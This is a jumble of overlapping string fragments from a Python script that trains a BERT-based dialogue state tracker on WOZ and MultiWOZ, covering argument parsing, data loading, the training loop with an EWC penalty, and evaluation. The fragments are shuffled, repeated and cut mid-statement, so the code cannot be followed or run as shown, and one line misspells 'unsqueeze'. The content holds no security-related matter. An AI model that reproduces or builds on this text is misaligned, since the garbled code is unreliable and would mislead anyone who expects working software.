"parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists", "label def _get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label:", "logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ###############################################################################", "= \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank !=", "torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model", "prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot,", "= %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # 
Analyze:", "label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len =", "examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps", "= input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc,", "label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] ==", "BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is", "_, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean()", "= BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model # in", "_ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean()", "the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json", "apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to", "raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name", "for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates", "label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids)", "Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100", "desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ =", "ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if ('slot'", "with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids,", "0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in", "if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length", "\"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines,", "- len(input_ids)) # Note: padding idx = 0 assert len(input_ids) == max_seq_length label_id,", "at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif", "help=\"Number of updates steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true',", "param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform", "device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if", "summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step", "processor.get_test_examples(args.data_dir, accumulation=accumulation) 
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,", "(max_seq_length - len(input_ids)) # Note: padding idx = 0 assert len(input_ids) == max_seq_length", "nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device,", "for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\":", "of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id =", "t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from", "None: if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for l", "(sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file)", "\"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir,", "ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" %", "shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total", "for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size", "with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids,", "labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len =", "+= acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot", "= FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate,", "= int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids =", "be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels,", "to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots", "logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key,", "padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. 
\\n\" \"Sequences longer", "help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of", "pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot =", "all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn = 0 for", "action='store_true', help=\"Set this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true',", "*****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size)", "key in del_list: del ptr_model[key] if n_gpu > 1: model = model.module state", "prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot,", "'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt", "optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer if not any(nd", "dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog", "InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer,", "= [0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn", "sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in", "for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids", "True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1,", "import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import", "i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace('", "############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir',", "< attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot", "in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn", "= ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot,", "loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss", "if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None", "input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. 
class Processor(DataProcessor):
    """Processor for the belief tracking dataset (GLUE version)."""

    def __init__(self, config):
        super(Processor, self).__init__()

        import json

        if config.data_dir == "data/woz" or config.data_dir == "data/woz-turn":
            fp_ontology = open(os.path.join(config.data_dir, "ontology_dstc2_en.json"), "r")
            ontology = json.load(fp_ontology)
            ontology = ontology["informable"]
            del ontology["request"]
            for slot in ontology.keys():
                ontology[slot].append("do not care")
                ontology[slot].append("none")
            fp_ontology.close()
        elif config.data_dir == "data/multiwoz":
            fp_ontology = open(os.path.join(config.data_dir, "ontology.json"), "r")
            ontology = json.load(fp_ontology)
            for slot in ontology.keys():
                ontology[slot].append("none")
            fp_ontology.close()

            if not config.target_slot == 'all':
                slot_idx = {'attraction': '0:1:2', 'bus': '3:4:5:6', 'hospital': '7',
                            'hotel': '8:9:10:11:12:13:14:15:16:17',
                            'restaurant': '18:19:20:21:22:23:24', 'taxi': '25:26:27:28',
                            'train': '29:30:31:32:33:34'}
                target_slot = []
                prev_slot = []
                for key, value in slot_idx.items():
                    if key == config.target_slot:
                        target_slot.append(value)
                    else:
                        prev_slot.append(value)
                config.target_slot = ':'.join(target_slot)
                config.prev_slot = ':'.join(prev_slot)
        else:
            raise NotImplementedError()

        # sorting the ontology according to the alphabetic order of the slots
        self.ontology = collections.OrderedDict(sorted(ontology.items()))

        # select slots to train
        self.target_slot = []
        self.prev_slot = []
        self.target_slot_idx = sorted([int(x) for x in config.target_slot.split(':')])
        self.prev_slot_idx = sorted([int(x) for x in config.prev_slot.split(':')])

        ontology_items = list(self.ontology.items())
        for idx, domain in enumerate(ontology_items):
            slot, value = domain
            if slot == "pricerange":
                slot = "price range"
            if idx in self.target_slot_idx:
                self.target_slot.append(slot)
            elif idx in self.prev_slot_idx:
                self.prev_slot.append(slot)

        self.all_slot = self.prev_slot + self.target_slot
        logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))
        logger.info('Processor: target slots: ' + ', '.join(self.target_slot))

    def get_train_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "train.tsv")), "train", accumulation)

    def get_dev_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev", accumulation)

    def get_test_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test.tsv")), "test", accumulation)

    def get_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.target_slot]

    def get_prev_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.prev_slot]

    def _create_examples(self, lines, set_type, accumulation=False):
        """Creates examples for the training and dev sets."""
        prev_dialogue_index = None
        examples = []
        for (i, line) in enumerate(lines):
            guid = "%s-%s-%s" % (set_type, line[0], line[1])  # line[0]: dialogue index, line[1]: turn index
            if accumulation:
                if prev_dialogue_index is None or prev_dialogue_index != line[0]:
                    text_a = line[2]
                    text_b = line[3]
                    prev_dialogue_index = line[0]
                else:
                    # The symbol '#' will be replaced with '[SEP]' after tokenization.
                    text_a = line[2] + " # " + text_a
                    text_b = line[3] + " # " + text_b
            else:
                text_a = line[2]  # line[2]: user utterance
                text_b = line[3]  # line[3]: system response

            label = [line[4 + idx] for idx in self.target_slot_idx]
            prev_label = [line[4 + idx] for idx in self.prev_slot_idx]

            examples.append(
                InputExample(guid=guid, text_a=text_a, text_b=text_b,
                             label=label, prev_label=prev_label))
        return examples
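# Sketch of the slot-index bookkeeping above (assuming the 35-slot MultiWOZ
# ontology ordering hard-coded in `slot_idx`): running with
# --target_slot attraction rewrites config.target_slot to '0:1:2' and
# config.prev_slot to the remaining domains' indices, colon-joined, so the
# rest of Processor.__init__ only ever sees numeric slot indices.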
def convert_examples_to_features(examples, label_list, prev_label_list,
                                 max_seq_length, tokenizer, max_turn_length):
    """Loads a data file into a list of `InputFeatures`s."""

    slot_dim = len(label_list)
    prev_slot_dim = len(prev_label_list)

    def _hard_coding_label(label):
        return 'do not care' if label == 'dontcare' else label

    def _get_label(label, label_list):
        label_id = []
        label_info = ''
        label_map = [{l: i for i, l in enumerate(labels)} for labels in label_list]
        for i, label in enumerate(label):
            label = _hard_coding_label(label)
            label_id.append(label_map[i][label])
            label_info += '%s (id = %d) ' % (label, label_map[i][label])
        return label_id, label_info

    features = []
    prev_dialogue_idx = None
    all_padding = [0] * max_seq_length
    all_padding_len = [0, 0]

    max_turn = 0
    for (ex_index, example) in enumerate(examples):
        if max_turn < int(example.guid.split('-')[2]):
            max_turn = int(example.guid.split('-')[2])
    max_turn_length = min(max_turn + 1, max_turn_length)

    for (ex_index, example) in enumerate(examples):
        tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
        tokens_b = None
        if example.text_b:
            tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
            # Account for [CLS], [SEP], [SEP] with "- 3"
            _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
        else:
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens_a) > max_seq_length - 2:
                tokens_a = tokens_a[:(max_seq_length - 2)]

        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        input_len = [len(tokens), 0]

        if tokens_b:
            tokens += tokens_b + ["[SEP]"]
            input_len[1] = len(tokens_b) + 1

        input_ids = tokenizer.convert_tokens_to_ids(tokens)

        # Zero-pad up to the sequence length.
        input_ids += [0] * (max_seq_length - len(input_ids))  # Note: padding idx = 0
        assert len(input_ids) == max_seq_length

        label_id, label_info = _get_label(example.label, label_list)
        prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)

        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % example.guid)
            logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
            logger.info("label: " + label_info)
            logger.info("previous label: " + prev_label_info)

        curr_dialogue_idx = example.guid.split('-')[1]
        curr_turn_idx = int(example.guid.split('-')[2])

        if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
            # a new dialogue begins: pad the previous dialogue out to max_turn_length
            if prev_turn_idx < max_turn_length:
                features += [InputFeatures(input_ids=all_padding,
                                           input_len=all_padding_len,
                                           label_id=[-1] * slot_dim,
                                           prev_label_id=[-1] * prev_slot_dim)] \
                            * (max_turn_length - prev_turn_idx - 1)
            assert len(features) % max_turn_length == 0

        if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:
            features.append(InputFeatures(input_ids=input_ids,
                                          input_len=input_len,
                                          label_id=label_id,
                                          prev_label_id=prev_label_id,
                                          ))

        prev_dialogue_idx = curr_dialogue_idx
        prev_turn_idx = curr_turn_idx

    # pad the final dialogue as well
    if prev_turn_idx < max_turn_length:
        features += [InputFeatures(input_ids=all_padding,
                                   input_len=all_padding_len,
                                   label_id=[-1] * slot_dim,
                                   prev_label_id=[-1] * prev_slot_dim)] \
                    * (max_turn_length - prev_turn_idx - 1)
    assert len(features) % max_turn_length == 0

    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_len = torch.tensor([f.input_len for f in features], dtype=torch.long)
    all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
    all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)

    # reshape tensors to [batch, turn, word]
    all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
    all_input_len = all_input_len.view(-1, max_turn_length, 2)
    all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
    all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)

    return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids
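# Shape summary for the tensors returned above (a sketch; the concrete numbers
# assume the defaults max_seq_length=64 and max_turn_length=22):
#   all_input_ids      [n_dialogues, 22, 64]  token ids, right-padded with 0
#   all_input_len      [n_dialogues, 22, 2]   lengths of the "[CLS] a [SEP]" and "b [SEP]" parts
#   all_label_ids      [n_dialogues, 22, n_target_slots]  value ids, -1 on padded turns
#   all_prev_label_ids [n_dialogues, 22, n_prev_slots]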
def get_label_embedding(labels, max_seq_length, tokenizer, device):
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)

        label_padding = [0] * (max_seq_length - len(label_token_ids))
        label_token_ids += label_padding
        assert len(label_token_ids) == max_seq_length

        features.append((label_token_ids, label_len))

    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)

    return all_label_token_ids, all_label_len


def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place to the maximum length."""
    # Simple heuristic: always truncate the longer sequence one token at a time.
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()


###############################################################################
# Miscellaneous functions
###############################################################################

def accuracy(out, labels):
    outputs = np.argmax(out, axis=1)
    return np.sum(outputs == labels)


def warmup_linear(x, warmup=0.002):
    if x < warmup:
        return x / warmup
    return 1.0 - x
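# A quick sanity check for the schedule above (a sketch, not called anywhere in
# this script): with warmup=0.1 the multiplier ramps linearly from 0 toward 1
# over the first 10% of training, then decays linearly as 1 - x. This is the
# factor the training loop multiplies into args.learning_rate via
# warmup_linear(global_step / t_total, args.warmup_proportion).
def _demo_warmup_linear():
    for frac in (0.0, 0.05, 0.1, 0.5, 1.0):
        print("%.2f -> %.2f" % (frac, warmup_linear(frac, warmup=0.1)))
    # 0.00 -> 0.00, 0.05 -> 0.50, 0.10 -> 0.90, 0.50 -> 0.50, 1.00 -> 0.00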
\\n\" \"Sequences longer than this", "/ nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc", "for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)", "max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer,", "f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return", "nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in", "= acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if", "get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError()", "json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology", "tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f,", "ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number", "= prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot /", "labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads", "should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the", "value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid],", "and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The", "a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir):", "x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value", "<= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")", "examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length,", "loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot,", "_create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the 
training and dev sets.\"\"\" prev_dialogue_index", "reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len =", "full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id =", "plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',", "elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else:", "output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0", "all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1,", "parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial", "self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ',", "BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn", "\"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot", "{} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank !=", "else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot,", "comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the", "label_info features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len", "'\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" %", "torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and", "= [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss", "= logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example", "Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after WordPiece", "def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return 1.0", "using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to", "default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. 
\\n\" \"Sequences", "return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)", "flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag", "x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS]", "= collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot = []", "global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\"", "ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer", "dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0", "ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for", "config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot", "for dialog in incorrect_dialogs: for turn in dialog: text = turn['input'] + '\\t'", "__init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology", "{} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: #", "* prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l", "SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val", "open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\"", "ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size /", "n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model):", "= list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task # tokenizer vocab_dir", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,", "epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0,", "argparse import random import collections import operator from tqdm import tqdm, trange import", "Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch", "all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch", "label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) ==", "-1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def 
    ###############################################################################
    # Load data
    ###############################################################################

    # Get Processor
    processor = Processor(args)
    prev_label_list = processor.get_prev_labels()      # slot value labels of the previous task
    target_label_list = processor.get_labels()         # slot value labels of the present task
    label_list = prev_label_list + target_label_list   # all slot value labels
    num_labels = [len(labels) for labels in label_list]  # Number of labels of all slots

    #prev_slot_id = processor.prev_slot_idx
    #target_slot_id = processor.target_slot_idx # wrong
    prev_slot_id = list(range(0, len(processor.prev_slot)))  # List of slots in previous task
    target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))  # list of slots in present task

    # tokenizer
    vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
    if not os.path.exists(vocab_dir):
